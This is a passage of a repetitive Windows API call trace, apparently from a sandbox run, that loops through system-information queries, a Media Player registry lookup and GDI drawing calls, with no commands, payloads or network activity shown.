GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.824] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.824] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.824] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.824] BeginPath (hdc=0x0) returned 0 [0087.824] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.825] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.825] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.825] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.825] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.825] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.825] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.825] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.825] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf90401d0 [0087.825] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfb0401cd [0087.825] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c51 [0087.825] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c52 [0087.825] CombineRgn (hrgnDst=0x1040c51, hrgnSrc1=0xf90401d0, hrgnSrc2=0xfb0401cd, iMode=1) returned 1 [0087.825] CombineRgn (hrgnDst=0x1040c52, hrgnSrc1=0xf90401d0, hrgnSrc2=0xfb0401cd, iMode=4) returned 2 [0087.825] CreateSolidBrush (color=0xff) returned 0x2100c50 [0087.825] CreateSolidBrush (color=0xff0000) returned 0x1100c53 [0087.825] DeleteObject (ho=0x1100c53) returned 1 [0087.825] DeleteObject (ho=0xfb0401cd) returned 1 [0087.825] DeleteObject (ho=0xf90401d0) returned 1 [0087.825] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.825] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.825] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.825] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.825] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.825] BeginPath (hdc=0x0) returned 0 [0087.825] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.825] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.825] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.825] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.825] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.825] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.825] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.825] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.825] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfc0401cd [0087.825] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfa0401d0 [0087.825] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c54 [0087.825] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c55 [0087.825] CombineRgn (hrgnDst=0x1040c54, hrgnSrc1=0xfc0401cd, hrgnSrc2=0xfa0401d0, iMode=1) returned 1 [0087.826] CombineRgn (hrgnDst=0x1040c55, hrgnSrc1=0xfc0401cd, hrgnSrc2=0xfa0401d0, iMode=4) returned 2 [0087.826] CreateSolidBrush (color=0xff) returned 0x2100c53 [0087.826] CreateSolidBrush (color=0xff0000) returned 0x1100c56 [0087.826] DeleteObject (ho=0x1100c56) returned 1 [0087.826] DeleteObject (ho=0xfa0401d0) returned 1 [0087.826] DeleteObject (ho=0xfc0401cd) returned 1 [0087.826] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.826] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.826] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.826] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.826] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.826] BeginPath (hdc=0x0) returned 0 [0087.826] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.826] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.826] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.826] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.826] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.826] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.826] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.826] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.859] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfb0401d0 [0087.859] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfd0401cd [0087.859] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce1 [0087.859] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce2 [0087.859] CombineRgn (hrgnDst=0x1040ce1, hrgnSrc1=0xfb0401d0, hrgnSrc2=0xfd0401cd, iMode=1) returned 1 [0087.859] CombineRgn (hrgnDst=0x1040ce2, hrgnSrc1=0xfb0401d0, hrgnSrc2=0xfd0401cd, iMode=4) returned 2 [0087.859] CreateSolidBrush (color=0xff) returned 0x2100c56 [0087.859] CreateSolidBrush (color=0xff0000) returned 0x1100ce3 [0087.859] DeleteObject (ho=0x1100ce3) returned 1 [0087.859] DeleteObject (ho=0xfd0401cd) returned 1 [0087.859] DeleteObject (ho=0xfb0401d0) returned 1 [0087.859] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.859] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.859] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.859] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.859] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.859] BeginPath (hdc=0x0) returned 0 [0087.859] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.859] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.859] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.859] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.859] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.859] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.859] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.859] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.859] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfe0401cd [0087.859] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfc0401d0 [0087.859] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce4 [0087.859] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce5 [0087.860] CombineRgn (hrgnDst=0x1040ce4, hrgnSrc1=0xfe0401cd, hrgnSrc2=0xfc0401d0, iMode=1) returned 1 [0087.860] CombineRgn (hrgnDst=0x1040ce5, hrgnSrc1=0xfe0401cd, hrgnSrc2=0xfc0401d0, iMode=4) returned 2 [0087.860] CreateSolidBrush (color=0xff) returned 0x2100ce3 [0087.860] CreateSolidBrush (color=0xff0000) returned 0x1100ce6 [0087.860] DeleteObject (ho=0x1100ce6) returned 1 [0087.860] DeleteObject (ho=0xfc0401d0) returned 1 [0087.860] DeleteObject (ho=0xfe0401cd) returned 1 [0087.860] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.860] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.860] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.860] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.860] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.860] BeginPath (hdc=0x0) returned 0 [0087.860] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.860] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.860] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.860] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.860] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.860] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.860] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.860] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.860] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfd0401d0 [0087.860] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xff0401cd [0087.860] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce7 [0087.860] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ce8 [0087.860] CombineRgn (hrgnDst=0x1040ce7, hrgnSrc1=0xfd0401d0, hrgnSrc2=0xff0401cd, iMode=1) returned 1 [0087.860] CombineRgn (hrgnDst=0x1040ce8, hrgnSrc1=0xfd0401d0, hrgnSrc2=0xff0401cd, iMode=4) returned 2 [0087.860] CreateSolidBrush (color=0xff) returned 0x2100ce6 [0087.860] CreateSolidBrush (color=0xff0000) returned 0x1100ce9 [0087.860] DeleteObject (ho=0x1100ce9) returned 1 [0087.860] DeleteObject (ho=0xff0401cd) returned 1 [0087.860] DeleteObject (ho=0xfd0401d0) returned 1 [0087.860] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.860] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.860] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.860] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.860] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.860] BeginPath (hdc=0x0) returned 0 [0087.861] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.861] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.861] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.861] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.861] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.861] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.861] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.861] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x401cd [0087.861] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfe0401d0 [0087.861] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cea [0087.861] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ceb [0087.861] CombineRgn (hrgnDst=0x1040cea, hrgnSrc1=0x401cd, hrgnSrc2=0xfe0401d0, iMode=1) returned 1 [0087.861] CombineRgn (hrgnDst=0x1040ceb, hrgnSrc1=0x401cd, hrgnSrc2=0xfe0401d0, iMode=4) returned 2 [0087.861] CreateSolidBrush (color=0xff) returned 0x2100ce9 [0087.861] CreateSolidBrush (color=0xff0000) returned 0x1100cec [0087.861] DeleteObject (ho=0x1100cec) returned 1 [0087.861] DeleteObject (ho=0xfe0401d0) returned 1 [0087.861] DeleteObject (ho=0x401cd) returned 1 [0087.861] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.861] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.861] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.861] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.861] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.861] BeginPath (hdc=0x0) returned 0 [0087.861] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.861] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.861] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.861] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.861] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.861] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.861] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.861] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xff0401d0 [0087.862] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x10401cd [0087.862] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ced [0087.862] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cee [0087.862] CombineRgn (hrgnDst=0x1040ced, hrgnSrc1=0xff0401d0, hrgnSrc2=0x10401cd, iMode=1) returned 1 [0087.862] CombineRgn (hrgnDst=0x1040cee, hrgnSrc1=0xff0401d0, hrgnSrc2=0x10401cd, iMode=4) returned 2 [0087.862] CreateSolidBrush (color=0xff) returned 0x2100cec [0087.862] CreateSolidBrush (color=0xff0000) returned 0x1100cef [0087.862] DeleteObject (ho=0x1100cef) returned 1 [0087.862] DeleteObject (ho=0x10401cd) returned 1 [0087.862] DeleteObject (ho=0xff0401d0) returned 1 [0087.862] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.862] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.862] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.862] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.862] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.862] BeginPath (hdc=0x0) returned 0 [0087.862] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.862] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.862] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.862] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.862] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.862] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.862] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.862] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x20401cd [0087.862] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x401d0 [0087.862] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf0 [0087.862] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf1 [0087.862] CombineRgn (hrgnDst=0x1040cf0, hrgnSrc1=0x20401cd, hrgnSrc2=0x401d0, iMode=1) returned 1 [0087.862] CombineRgn (hrgnDst=0x1040cf1, hrgnSrc1=0x20401cd, hrgnSrc2=0x401d0, iMode=4) returned 2 [0087.862] CreateSolidBrush (color=0xff) returned 0x2100cef [0087.862] CreateSolidBrush (color=0xff0000) returned 0x1100cf2 [0087.862] DeleteObject (ho=0x1100cf2) returned 1 [0087.862] DeleteObject (ho=0x401d0) returned 1 [0087.862] DeleteObject (ho=0x20401cd) returned 1 [0087.862] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.862] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.863] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.863] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.863] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.863] BeginPath (hdc=0x0) returned 0 [0087.863] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.863] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.863] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.863] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.863] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.863] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.863] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.863] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x10401d0 [0087.863] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x30401cd [0087.863] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf3 [0087.863] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf4 [0087.863] CombineRgn (hrgnDst=0x1040cf3, hrgnSrc1=0x10401d0, hrgnSrc2=0x30401cd, iMode=1) returned 1 [0087.863] CombineRgn (hrgnDst=0x1040cf4, hrgnSrc1=0x10401d0, hrgnSrc2=0x30401cd, iMode=4) returned 2 [0087.863] CreateSolidBrush (color=0xff) returned 0x2100cf2 [0087.863] CreateSolidBrush (color=0xff0000) returned 0x1100cf5 [0087.863] DeleteObject (ho=0x1100cf5) returned 1 [0087.863] DeleteObject (ho=0x30401cd) returned 1 [0087.863] DeleteObject (ho=0x10401d0) returned 1 [0087.863] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.863] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.863] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.863] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.863] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.863] BeginPath (hdc=0x0) returned 0 [0087.863] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.863] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.863] BeginPaint (in: hWnd=0x0, 